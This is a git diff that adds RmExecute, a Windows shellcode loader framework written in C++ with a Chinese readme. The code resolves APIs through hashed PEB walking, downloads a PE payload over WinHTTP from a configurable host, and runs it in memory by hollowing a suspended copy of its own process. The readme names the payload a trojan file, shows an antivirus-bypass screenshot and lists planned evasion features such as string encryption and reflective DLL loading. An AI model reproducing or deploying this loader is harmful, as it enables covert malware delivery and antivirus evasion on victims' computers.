__stdcall Strat(char * URL) +{ + //Ҫģȫֱʹ + RmExecute runclass; + + runclass.StartSCode(URL); +} + +void __declspec(naked) mmLoaderSCEnd() +{ + __asm int 3; +} \ No newline at end of file diff --git a/RmExecute/ShellCode.h b/RmExecute/ShellCode.h new file mode 100644 index 0000000..88e841e --- /dev/null +++ b/RmExecute/ShellCode.h @@ -0,0 +1,15 @@ +#include +#include +#include +#include +#include +#include "api.h" + + +EXTERN_C VOID +mmLoaderSCStart();//shellcodeĿʼ + +void __stdcall Strat(char * URL);//ںmain + +EXTERN_C VOID +mmLoaderSCEnd();//뿪ͷӦĽβ \ No newline at end of file diff --git a/RmExecute/Tool.h b/RmExecute/Tool.h new file mode 100644 index 0000000..440a874 --- /dev/null +++ b/RmExecute/Tool.h @@ -0,0 +1,381 @@ + +#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift))) + +HMODULE RmExecute::GetProcAddressWithHash(DWORD dwModuleFunctionHash) +{ + PPEB PebAddress; + PMY_PEB_LDR_DATA pLdr; + PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry; + PVOID pModuleBase; + PIMAGE_NT_HEADERS pNTHeader; + DWORD dwExportDirRVA; + PIMAGE_EXPORT_DIRECTORY pExportDir; + PLIST_ENTRY pNextModule; + DWORD dwNumFunctions; + USHORT usOrdinalTableIndex; + PDWORD pdwFunctionNameBase; + PCSTR pFunctionName; + UNICODE_STRING BaseDllName; + DWORD dwModuleHash; + DWORD dwFunctionHash; + PCSTR pTempChar; + DWORD i; + +#if defined(_WIN64) + PebAddress = (PPEB)__readgsqword(0x60); +#elif defined(_M_ARM) + PebAddress = (PPEB)((ULONG_PTR)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0); + __emit(0x00006B1B); +#else + PebAddress = (PPEB)__readfsdword(0x30); +#endif + + pLdr = (PMY_PEB_LDR_DATA)PebAddress->Ldr; + pNextModule = pLdr->InLoadOrderModuleList.Flink; + pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pNextModule; + + while (pDataTableEntry->DllBase != NULL) + { + dwModuleHash = 0; + pModuleBase = pDataTableEntry->DllBase; + BaseDllName = pDataTableEntry->BaseDllName; + pNTHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pModuleBase + ((PIMAGE_DOS_HEADER)pModuleBase)->e_lfanew); + dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress; + + //ȡһģַ + pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pDataTableEntry->InLoadOrderLinks.Flink; + + // ǰģ鲻κκתһģ ģ + if (dwExportDirRVA == 0) + { + continue; + } + + //ģϣֵ + for (i = 0; i < BaseDllName.MaximumLength; i++) + { + pTempChar = ((PCSTR)BaseDllName.Buffer + i); + + dwModuleHash = ROTR32(dwModuleHash, 13); + + if (*pTempChar >= 0x61) + { + dwModuleHash += *pTempChar - 0x20; + } + else + { + dwModuleHash += *pTempChar; + } + } + + pExportDir = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)pModuleBase + dwExportDirRVA); + + dwNumFunctions = pExportDir->NumberOfNames; + pdwFunctionNameBase = (PDWORD)((PCHAR)pModuleBase + pExportDir->AddressOfNames); + + for (i = 0; i < dwNumFunctions; i++) + { + dwFunctionHash = 0; + pFunctionName = (PCSTR)(*pdwFunctionNameBase + (ULONG_PTR)pModuleBase); + pdwFunctionNameBase++; + + pTempChar = pFunctionName; + + do + { + dwFunctionHash = ROTR32(dwFunctionHash, 13); + dwFunctionHash += *pTempChar; + pTempChar++; + } while (*(pTempChar - 1) != 0); + + dwFunctionHash += dwModuleHash; + + if (dwFunctionHash == dwModuleFunctionHash) + { + usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i)); + return (HMODULE)((ULONG_PTR)pModuleBase + *(PDWORD)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex))); + } + } + } + + return NULL; +} + + + + +void RmExecute::Initfunctions(Pfunctions pfn) +{ + + + pfn->fnLoadLibraryA = (pfnLoadLibraryA)GetProcAddressWithHash(HASH_LoadLibraryA); + + + + + + + + //ȡLoadLibraryAַ + + + pfn->fnGetModuleFileNameA = (pfnGetModuleFileNameA)GetProcAddressWithHash(HASH_GetModuleFileNameA); + + char szUser32[] = { 'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 }; + pfn->fnLoadLibraryA(szUser32); + char szMsvcrt[] = { 'm', 's', 'v', 'c', 'r', 't', '.', 'd', 'l', 'l', 0 }; + pfn->fnLoadLibraryA(szMsvcrt); + char szWinhttp[] = { 'w', 'i', 'n', 'h', 't', 't', 'p', '.', 'd', 'l', 'l', 0 }; + pfn->fnLoadLibraryA(szWinhttp); + + pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA); + pfn->fnCreateProcessA = (pfnCreateProcessA)GetProcAddressWithHash(HASH_CreateProcessA); + pfn->fnGetThreadContext = (pfnGetThreadContext)GetProcAddressWithHash(HASH_GetThreadContext); + pfn->fnReadProcessMemory = (pfnReadProcessMemory)GetProcAddressWithHash(HASH_ReadProcessMemory); + pfn->fnVirtualAllocEx = (pfnVirtualAllocEx)GetProcAddressWithHash(HASH_VirtualAllocEx); + pfn->fnWriteProcessMemory = (pfnWriteProcessMemory)GetProcAddressWithHash(HASH_WriteProcessMemory); + pfn->fnSetThreadContext = (pfnSetThreadContext)GetProcAddressWithHash(HASH_SetThreadContext); + pfn->fnResumeThread = (pfnResumeThread)GetProcAddressWithHash(HASH_ResumeThread); + pfn->fnVirtualAlloc = (pfnVirtualAlloc)GetProcAddressWithHash(HASH_VirtualAlloc); + + + + + + + + + + pfn->fnmalloc = (pfnmalloc)GetProcAddressWithHash(HASH_malloc); + pfn->fnfree = (pfnfree)GetProcAddressWithHash(HASH_free); + pfn->fnmemset = (pfnmemset)GetProcAddressWithHash(HASH_memset); + pfn->fnmemcpy = (pfnmemcpy)GetProcAddressWithHash(HASH_memcpy); + pfn->fnmemcmp = (pfnmemcmp)GetProcAddressWithHash(HASH_memcmp); + pfn->fnstrlen = (pfnstrlen)GetProcAddressWithHash(HASH_strlen); + pfn->fnstrcpy = (pfnstrcpy)GetProcAddressWithHash(HASH_strcpy); + pfn->fnstrcat = (pfnstrcat)GetProcAddressWithHash(HASH_strcat); + + + + + pfn->fnWinHttpOpen = (pfnWinHttpOpen)GetProcAddressWithHash(HASH_WinHttpOpen); + pfn->fnWinHttpConnect = (pfnWinHttpConnect)GetProcAddressWithHash(HASH_WinHttpConnect); + pfn->fnWinHttpOpenRequest = (pfnWinHttpOpenRequest)GetProcAddressWithHash(HASH_WinHttpOpenRequest); + pfn->fnWinHttpAddRequestHeaders = (pfnWinHttpAddRequestHeaders)GetProcAddressWithHash(HASH_WinHttpAddRequestHeaders); + pfn->fnWinHttpSendRequest = (pfnWinHttpSendRequest)GetProcAddressWithHash(HASH_WinHttpSendRequest); + pfn->fnWinHttpReceiveResponse = (pfnWinHttpReceiveResponse)GetProcAddressWithHash(HASH_WinHttpReceiveResponse); + pfn->fnWinHttpQueryDataAvailable = (pfnWinHttpQueryDataAvailable)GetProcAddressWithHash(HASH_WinHttpQueryDataAvailable); + pfn->fnWinHttpReadData = (pfnWinHttpReadData)GetProcAddressWithHash(HASH_WinHttpReadData); + pfn->fnWinHttpCloseHandle = (pfnWinHttpCloseHandle)GetProcAddressWithHash(HASH_WinHttpCloseHandle); + + +} + + +// һҪfree +int RmExecute::HttpDownload(wchar_t* target, wchar_t* path, INTERNET_PORT port,BOOL useSSL =FALSE) { + + + DWORD dwSize = 0; + DWORD dwDownloaded = 0; + DWORD dwLast = 0; + LPSTR pszOutBuffer; + BOOL bResults = FALSE; + + HINTERNET hSession = NULL, + hConnect = NULL, + hRequest = NULL; + newbuff = NULL; + + + + // Use WinHttpOpen to obtain a session handle. + wchar_t Sign[] = { 'W','i','n','H','T','T','P',' ','E','x','a','m','p','l','e','/','1','.','0','\0' }; + + hSession = fn.fnWinHttpOpen(Sign, + WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, + WINHTTP_NO_PROXY_NAME, + WINHTTP_NO_PROXY_BYPASS, 0); + + // Specify an HTTP server. + if (hSession) + hConnect = fn.fnWinHttpConnect(hSession, target, + port, 0); + wchar_t GET[] = { 'G','E','T','\0' }; + // Create an HTTP request handle. + if (hConnect){} + + + hRequest = fn.fnWinHttpOpenRequest(hConnect, GET, path, + NULL, WINHTTP_NO_REFERER, + WINHTTP_DEFAULT_ACCEPT_TYPES, + useSSL ? WINHTTP_FLAG_SECURE : 0); + + + + +/* +#ifndef _WIN64 + LPCWSTR header = L"Accept-platform: x86\n"; + SIZE_T len = lstrlenW(header); + WinHttpAddRequestHeaders(hRequest, header, len, WINHTTP_ADDREQ_FLAG_ADD); +#else + LPCWSTR header = L"Accept-platform: x64\n"; + SIZE_T len = lstrlenW(header); + WinHttpAddRequestHeaders(hRequest, header, len, WINHTTP_ADDREQ_FLAG_ADD); +#endif +*/ + + + // Send a request. + if (hRequest) + bResults = fn.fnWinHttpSendRequest(hRequest, + WINHTTP_NO_ADDITIONAL_HEADERS, 0, + WINHTTP_NO_REQUEST_DATA, 0, + 0, 0); + + + // End the request. + if (bResults) + bResults = fn.fnWinHttpReceiveResponse(hRequest, NULL); + + // Keep checking for data until there is nothing left. + if (bResults) + { + do + { + // Check for available data. + dwSize = 0; + if (!fn.fnWinHttpQueryDataAvailable(hRequest, &dwSize)) + return dwLast; + // Allocate space for the buffer. + //pszOutBuffer = new char[dwSize + 1]; + BOOL Second = FALSE; + if (dwLast != 0) { + newbuff = (char *)fn.fnmalloc(dwLast + dwSize + 1); + fn.fnmemset(newbuff, 0, dwLast + dwSize + 1); + fn.fnmemcpy(newbuff, pszOutBuffer, dwLast); + fn.fnfree(pszOutBuffer); + pszOutBuffer = newbuff; + dwLast += dwSize; + Second = TRUE; + } + else { + newbuff = (LPSTR)fn.fnmalloc(dwSize + 1); + pszOutBuffer = newbuff; + dwLast = dwSize; + + } + if (!pszOutBuffer) + { + return dwLast; + dwSize = 0; + } + else + { + // Read the data. + //ZeroMemory(pszOutBuffer, dwSize + 1); + + BOOL Flag; + if (Second) { + + Flag = fn.fnWinHttpReadData(hRequest, (LPVOID)(pszOutBuffer + dwLast-dwSize), + dwSize, &dwDownloaded); + } + else { + fn.fnmemset(pszOutBuffer, 0, dwSize + 1); + Flag = fn.fnWinHttpReadData(hRequest, (LPVOID)(pszOutBuffer), + dwSize, &dwDownloaded); + } + if (!Flag) + return dwLast; + + + // Free the memory allocated to the buffer. + //delete[] pszOutBuffer; + //fn.fnfree(pszOutBuffer); + + } + } while (dwSize > 0); + } + + + // Report any errors. + if (!bResults) + return dwLast; + + // Close any open handles. + if (hRequest) fn.fnWinHttpCloseHandle(hRequest); + if (hConnect) fn.fnWinHttpCloseHandle(hConnect); + if (hSession) fn.fnWinHttpCloseHandle(hSession); + return dwLast; +} + + +bool RmExecute::RunPortableExecutable() +{ + + IMAGE_DOS_HEADER* DOSHeader; // For Nt DOS Header symbols + IMAGE_NT_HEADERS* NtHeader; // For Nt PE Header objects & symbols + IMAGE_SECTION_HEADER* SectionHeader; + + PROCESS_INFORMATION PI; + STARTUPINFOA SI; + + CONTEXT* CTX; + + DWORD* ImageBase = NULL;; //Base address of the image + void* pImageBase = NULL;; // Pointer to the image base + + char CurrentFilePath[MAX_PATH]; + + DOSHeader = PIMAGE_DOS_HEADER(newbuff); // Initialize Variable + NtHeader = PIMAGE_NT_HEADERS(DWORD(newbuff) + DOSHeader->e_lfanew); // Initialize + + fn.fnGetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable + + if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Check if image is a PE File. + { + //ZeroMemory(&PI, sizeof(PI)); // Null the memory + //ZeroMemory(&SI, sizeof(SI)); // Null the memory + fn.fnmemset(&PI, 0, sizeof(PI)); + fn.fnmemset(&SI, 0, sizeof(SI)); + if (fn.fnCreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) //make process in suspended state, for the new image. + { + // Allocate memory for the context. + CTX = LPCONTEXT(fn.fnVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE)); + CTX->ContextFlags = CONTEXT_FULL; // Context is allocated + + if (fn.fnGetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread + { + // Read instructions + fn.fnReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0); + pImageBase = fn.fnVirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase), NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); + + //fix randomly crash + if (pImageBase == 0) { + fn.fnResumeThread(PI.hThread); + return 1; + } + else { + // Write the image to the process + fn.fnWriteProcessMemory(PI.hProcess, pImageBase, newbuff, NtHeader->OptionalHeader.SizeOfHeaders, NULL); + for (int count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) + { + SectionHeader = PIMAGE_SECTION_HEADER(DWORD(newbuff) + DOSHeader->e_lfanew + 248 + (count * 40)); + fn.fnWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress), LPVOID(DWORD(newbuff) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0); + } + fn.fnWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0); + + // Move address of entry point to the eax register + CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint; + fn.fnSetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context + fn.fnResumeThread(PI.hThread); //?Start the process/call main() + } + + return true; // Operation was successful. + } + } + } + return false; +} diff --git a/RmExecute/api.h b/RmExecute/api.h new file mode 100644 index 0000000..ffc0c5d --- /dev/null +++ b/RmExecute/api.h @@ -0,0 +1,234 @@ +#pragma once +#include "hash.h" +#include +#include +//ϣֵ +#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift))) + +//¶PEBṹwinternl.hеĽṹDzġ +typedef struct _MY_PEB_LDR_DATA { + ULONG Length; + BOOL Initialized; + PVOID SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; +} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA; + +typedef struct _MY_LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; +} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY; + + +//庯ָ + +// Kernel32 + +typedef LPVOID (WINAPI* pfnVirtualAlloc)( + LPVOID lpAddress, + SIZE_T dwSize, + DWORD flAllocationType, + DWORD flProtect +); +typedef DWORD(WINAPI* pfnGetModuleFileNameA)( + HMODULE hModule, + LPSTR lpFilename, + DWORD nSize + ); + +typedef BOOL (WINAPI *pfnCreateProcessA)( + LPCSTR lpApplicationName, + LPSTR lpCommandLine, + LPSECURITY_ATTRIBUTES lpProcessAttributes, + LPSECURITY_ATTRIBUTES lpThreadAttributes, + BOOL bInheritHandles, + DWORD dwCreationFlags, + LPVOID lpEnvironment, + LPCSTR lpCurrentDirectory, + LPSTARTUPINFOA lpStartupInfo, + LPPROCESS_INFORMATION lpProcessInformation +); +typedef BOOL (WINAPI * pfnGetThreadContext)( + HANDLE hThread, + LPCONTEXT lpContext +); + +typedef BOOL (WINAPI * pfnReadProcessMemory)( + HANDLE hProcess, + LPCVOID lpBaseAddress, + LPVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesRead +); + +typedef LPVOID (WINAPI * pfnVirtualAllocEx)( + HANDLE hProcess, + LPVOID lpAddress, + SIZE_T dwSize, + DWORD flAllocationType, + DWORD flProtect +); + +typedef BOOL (WINAPI * pfnWriteProcessMemory)( + HANDLE hProcess, + LPVOID lpBaseAddress, + LPCVOID lpBuffer, + SIZE_T nSize, + SIZE_T* lpNumberOfBytesWritten +); + +typedef BOOL (WINAPI* pfnSetThreadContext)( + HANDLE hThread, + const CONTEXT* lpContext +); + + +typedef DWORD (WINAPI* pfnResumeThread)( + HANDLE hThread +); + +typedef HMODULE(WINAPI* pfnLoadLibraryA)(LPCSTR lpLibFileName); + +//user_32 + +typedef int (WINAPI *pfnMessageBoxA)(HWND hWnd,LPCSTR lpText,LPCSTR lpCaption,UINT uType); + + + +// Msvcrt +typedef void* (__cdecl* pfnmalloc)(size_t _Size); +typedef void (WINAPI* pfnfree)(void* _Memory); +typedef void* (WINAPI* pfnmemset)(_Out_writes_bytes_all_(_Size) void* _Dst, _In_ int _Val, _In_ size_t _Size); +typedef void* (WINAPI* pfnmemcpy)(void* _Dst, const void* _Src, _In_ size_t _Size); +typedef void(WINAPI* pfnsrand)(_In_ unsigned int _Seed); +typedef __time32_t(WINAPI* pfn_time32)(_Out_opt_ __time32_t* _Time); +typedef int(WINAPI* pfnrand)(void); +typedef char* (WINAPI* pfnstrrchr)(_In_z_ const char* _Str, _In_ int _Ch); +typedef size_t(WINAPI* pfnstrlen)(_In_z_ const char* _Str); +typedef void* (WINAPI* pfmemmove)(_Out_writes_bytes_all_opt_(_Size) void* _Dst, _In_reads_bytes_opt_(_Size) const void* _Src, _In_ size_t _Size); +typedef int(__cdecl* pfnmemcmp)(_In_reads_bytes_(_Size) const void* _Buf1, _In_reads_bytes_(_Size) const void* _Buf2, _In_ size_t _Size); +typedef char* (WINAPI* pfnstrcpy)(char* _Dest, const char* _Source); +typedef char* (WINAPI* pfnstrcat)(char* _Dest, _In_z_ const char* _Source); + + +//WinHttp +typedef LPVOID HINTERNET; +typedef HINTERNET* LPHINTERNET; + +typedef WORD INTERNET_PORT; + +typedef INTERNET_PORT* LPINTERNET_PORT; +typedef HINTERNET(WINAPI * pfnWinHttpOpen)( + LPCWSTR pszAge, + DWORD dwAccessType, + LPCWSTR pszProxyW, + LPCWSTR pszProxyBypassW, + DWORD dwFlags +); + +typedef HINTERNET (WINAPI* pfnWinHttpConnect)( + HINTERNET hSession, + LPCWSTR pswzServerName, + INTERNET_PORT nServerPort, + DWORD dwReserved +); + +typedef HINTERNET (WINAPI *pfnWinHttpOpenRequest)( + HINTERNET hConnect, + LPCWSTR pwszVerb, + LPCWSTR pwszObjectName, + LPCWSTR pwszVersion, + LPCWSTR pwszReferrer, + LPCWSTR* ppwszAcceptTypes, + DWORD dwFlags +); +typedef BOOL(WINAPI* pfnWinHttpAddRequestHeaders)( + HINTERNET hRequest, + LPCWSTR lpszHeaders, + DWORD dwHeadersLength, + DWORD dwModifiers +); + +typedef BOOL(WINAPI* pfnWinHttpSendRequest)( + HINTERNET hRequest, + LPCWSTR lpszHeaders, + DWORD dwHeadersLength, + LPVOID lpOptional, + DWORD dwOptionalLength, + DWORD dwTotalLength, + DWORD_PTR dwContext +); + +typedef BOOL (WINAPI* pfnWinHttpReceiveResponse)( + HINTERNET hRequest, + LPVOID lpReserved +); + +typedef BOOL (WINAPI* pfnWinHttpQueryDataAvailable)( + HINTERNET hRequest, + LPDWORD lpdwNumberOfBytesAvailable +); + +typedef BOOL (WINAPI* pfnWinHttpReadData)( + HINTERNET hRequest, + LPVOID lpBuffer, + DWORD dwNumberOfBytesToRead, + LPDWORD lpdwNumberOfBytesRead +); +typedef BOOL (WINAPI* pfnWinHttpCloseHandle)( + HINTERNET hInternet +); + + + +//ָṹ +typedef struct _FUNCTIONS +{ + pfnVirtualAlloc fnVirtualAlloc; + pfnGetModuleFileNameA fnGetModuleFileNameA; + pfnCreateProcessA fnCreateProcessA; + pfnGetThreadContext fnGetThreadContext; + pfnReadProcessMemory fnReadProcessMemory; + pfnVirtualAllocEx fnVirtualAllocEx; + pfnWriteProcessMemory fnWriteProcessMemory; + pfnSetThreadContext fnSetThreadContext; + pfnResumeThread fnResumeThread; + + pfnLoadLibraryA fnLoadLibraryA; + + + + pfnMessageBoxA fnMessageBoxA; + pfnmalloc fnmalloc; + pfnfree fnfree; + pfnmemset fnmemset; + pfnmemcpy fnmemcpy; + pfnmemcmp fnmemcmp; + pfnsrand fnsrand; + pfnrand fnrand; + pfnstrlen fnstrlen; + + pfnstrcpy fnstrcpy; + pfnstrcat fnstrcat; + + pfnWinHttpOpen fnWinHttpOpen; + pfnWinHttpConnect fnWinHttpConnect; + pfnWinHttpOpenRequest fnWinHttpOpenRequest; + pfnWinHttpAddRequestHeaders fnWinHttpAddRequestHeaders; + pfnWinHttpSendRequest fnWinHttpSendRequest; + pfnWinHttpReceiveResponse fnWinHttpReceiveResponse; + pfnWinHttpQueryDataAvailable fnWinHttpQueryDataAvailable; + pfnWinHttpReadData fnWinHttpReadData; + pfnWinHttpCloseHandle fnWinHttpCloseHandle; + +}Functions,*Pfunctions; + + diff --git a/RmExecute/hash.h b/RmExecute/hash.h new file mode 100644 index 0000000..ba12959 --- /dev/null +++ b/RmExecute/hash.h @@ -0,0 +1,31 @@ +#define HASH_VirtualAlloc 0xE553A458 +#define HASH_GetModuleFileNameA 0xFE61445D +#define HASH_LoadLibraryA 0x0726774C +#define HASH_CreateProcessA 0x863FCC79 +#define HASH_GetThreadContext 0xD1425C18 +#define HASH_ReadProcessMemory 0x71F9D3C2 +#define HASH_VirtualAllocEx 0x3F9287AE +#define HASH_WriteProcessMemory 0xE7BDD8C5 +#define HASH_SetThreadContext 0xD14E5C18 +#define HASH_ResumeThread 0x8EF4092B + +#define HASH_MessageBoxA 0x07568345 + +#define HASH_malloc 0x7EA37D50 +#define HASH_free 0x08FF1A9F +#define HASH_memset 0x8D2B8AD2 +#define HASH_memcmp 0x6D0B8CD2 +#define HASH_memcpy 0x6D538D92 +#define HASH_strlen 0xFF13DAD9 +#define HASH_strcpy 0xED6BDD99 +#define HASH_strcat 0xED43D9D9 + +#define HASH_WinHttpOpen 0xBB9D1F04 +#define HASH_WinHttpConnect 0xC21E9B46 +#define HASH_WinHttpOpenRequest 0x5BB31098 +#define HASH_WinHttpAddRequestHeaders 0x6DF126A0 +#define HASH_WinHttpSendRequest 0x91BB5895 +#define HASH_WinHttpReceiveResponse 0x709D8805 +#define HASH_WinHttpQueryDataAvailable 0x4A050E50 +#define HASH_WinHttpReadData 0x7E24296C +#define HASH_WinHttpCloseHandle 0x5DAEF12F \ No newline at end of file diff --git a/RmExecute/open.txt b/RmExecute/open.txt new file mode 100644 index 0000000..02cfe0b --- /dev/null +++ b/RmExecute/open.txt @@ -0,0 +1 @@ +213 \ No newline at end of file diff --git a/RmExecute/stdafx.cpp b/RmExecute/stdafx.cpp new file mode 100644 index 0000000..b7686a5 --- /dev/null +++ b/RmExecute/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : ֻ׼ļԴļ +// RcDllShelcode.pch ΪԤͷ +// stdafx.obj ԤϢ + +#include "stdafx.h" + +// TODO: STDAFX.H +// κĸͷļڴļ diff --git a/RmExecute/stdafx.h b/RmExecute/stdafx.h new file mode 100644 index 0000000..2bae7ae --- /dev/null +++ b/RmExecute/stdafx.h @@ -0,0 +1,113 @@ +// stdafx.h : ׼ϵͳļİļ +// Ǿʹõĵ +// ضĿİļ +// + +#pragma once + +#include "targetver.h" + +#include +#include + +/* +#define VMP_BEGINV \ +_asm _emit 0xEB \ +_asm _emit 0x10 \ +_asm _emit 0x56 \ +_asm _emit 0x4D \ +_asm _emit 0x50 \ +_asm _emit 0x72 \ +_asm _emit 0x6F \ +_asm _emit 0x74 \ +_asm _emit 0x65 \ +_asm _emit 0x63 \ +_asm _emit 0x74 \ +_asm _emit 0x20 \ +_asm _emit 0x62 \ +_asm _emit 0x65 \ +_asm _emit 0x67 \ +_asm _emit 0x69 \ +_asm _emit 0x6E \ +_asm _emit 0x01 + +#define VMP_BEGINM \ +_asm _emit 0xEB \ +_asm _emit 0x10 \ +_asm _emit 0x56 \ +_asm _emit 0x4D \ +_asm _emit 0x50 \ +_asm _emit 0x72 \ +_asm _emit 0x6F \ +_asm _emit 0x74 \ +_asm _emit 0x65 \ +_asm _emit 0x63 \ +_asm _emit 0x74 \ +_asm _emit 0x20 \ +_asm _emit 0x62 \ +_asm _emit 0x65 \ +_asm _emit 0x67 \ +_asm _emit 0x69 \ +_asm _emit 0x6E \ +_asm _emit 0x02 + + +#define VMP_BEGINU \ +_asm _emit 0xEB \ +_asm _emit 0x10 \ +_asm _emit 0x56 \ +_asm _emit 0x4D \ +_asm _emit 0x50 \ +_asm _emit 0x72 \ +_asm _emit 0x6F \ +_asm _emit 0x74 \ +_asm _emit 0x65 \ +_asm _emit 0x63 \ +_asm _emit 0x74 \ +_asm _emit 0x20 \ +_asm _emit 0x62 \ +_asm _emit 0x65 \ +_asm _emit 0x67 \ +_asm _emit 0x69 \ +_asm _emit 0x6E \ +_asm _emit 0x03 + +#define VMP_BEGIN \ +_asm _emit 0xEB \ +_asm _emit 0x10 \ +_asm _emit 0x56 \ +_asm _emit 0x4D \ +_asm _emit 0x50 \ +_asm _emit 0x72 \ +_asm _emit 0x6F \ +_asm _emit 0x74 \ +_asm _emit 0x65 \ +_asm _emit 0x63 \ +_asm _emit 0x74 \ +_asm _emit 0x20 \ +_asm _emit 0x62 \ +_asm _emit 0x65 \ +_asm _emit 0x67 \ +_asm _emit 0x69 \ +_asm _emit 0x6E \ +_asm _emit 0x00 + +#define VMP_END \ +_asm _emit 0xEB \ +_asm _emit 0x0E \ +_asm _emit 0x56 \ +_asm _emit 0x4D \ +_asm _emit 0x50 \ +_asm _emit 0x72 \ +_asm _emit 0x6F \ +_asm _emit 0x74 \ +_asm _emit 0x65 \ +_asm _emit 0x63 \ +_asm _emit 0x74 \ +_asm _emit 0x20 \ +_asm _emit 0x65 \ +_asm _emit 0x6E \ +_asm _emit 0x64 \ +_asm _emit 0x00 +// TODO: ڴ˴óҪͷļ +*/ \ No newline at end of file diff --git a/RmExecute/targetver.h b/RmExecute/targetver.h new file mode 100644 index 0000000..7a7d2c8 --- /dev/null +++ b/RmExecute/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// SDKDDKVer.h õ߰汾 Windows ƽ̨ + +// ҪΪǰ Windows ƽ̨Ӧó WinSDKVer.h +// WIN32_WINNT ΪҪֵ֧ƽ̨Ȼٰ SDKDDKVer.h + +#include diff --git a/readme.md b/readme.md new file mode 100644 index 0000000..94cdd4a --- /dev/null +++ b/readme.md @@ -0,0 +1,77 @@ +# RmExecute + +Remote Download and Memory Execute for shellcode framework + +远程下载并内存加载的ShellCode框架,暂不支持X64 + +# 参(抄)考(袭)项目 + +## [windows下shellcode提取模板的实现](https://bbs.pediy.com/thread-229398.htm) + +主要抄袭来源,直接使用这位大佬的shellcode框架,并且强烈推荐看下他文章内的doc,分析的非常好 + +## [PIC_Bindshell](https://github.com/mattifestation/PIC_Bindshell) + +windows api hashing部分直接搬过来的 + +## (ReflectiveDLLInjection)[https://github.com/stephenfewer/ReflectiveDLLInjection] + +准备抄袭 + +## [开(犯)发(罪)过程](https://9bie.org/index.php/archives/750/) + +# 效果图 + +![bypassAV](Image/bypassAV.jpg) + +# How to use + +## 开箱即用 + +修改`ShellCode.cpp->StartSCode`函数中的host和path改为您的域名和木马文件即可,之后使用`Release`模式运行,即会在目录下生成`123.bin`文件,之后使用`EXE_RUN_MT`模式编译运行即可加载`123.bin`文件 + +或是自行调用`123.bin`文件 + +## 添加API + +使用目录下的`Get-FunctionsHash.ps1`脚本添加API HASH到hash.h + +![计算HASH](img/hash.png) + +之后在`API.H`中添加相关WINAPI 函数指针,作为搜索地址后调用的方式,之后在`API.H->FUNCTIONS`结构体中添加相关成员 + +之后在`Tool.h->RmExecute::Initfunctions`函数中调用 + +```c +char szUser32[] = { 'u', 's', 'e', 'r', '3', '2', '.', 'd', 'l', 'l', 0 }; +pfn->fnLoadLibraryA(szUser32); +pfn->fnMessageBoxA = (pfnMessageBoxA)GetProcAddressWithHash(HASH_MessageBoxA); +``` +搜索函数来加载WINAPI。 + +之后就可以使用 +`fn.fnMessageBox(0, "text", "text", MB_OK);`这样形式来调用winapi了。 + + +## 字符串相关 + +参考第一个引用的文章链接,字符串必须要使用`{'a','b','\0'};`这样子的立即数形式 + +# 进阶 (很快) + +## 使用XOR加密字符串 + +隐藏loadlibrary特征和url特征,更不容易被发现 + +## X64支持 + +自行调试`Tool.h->RunPortableExecutable`函数,大概就是加个X64宏把EAX什么换成RAX(应该 + +## 反射DLL加载技术 + +完全不使用LoadLibrary,ProcessExplorer、procexp64等工具无法检测到这个dll,同时让程序变得模块化 + +## 纯shellcode加载 + +太奢侈了我就是想想 +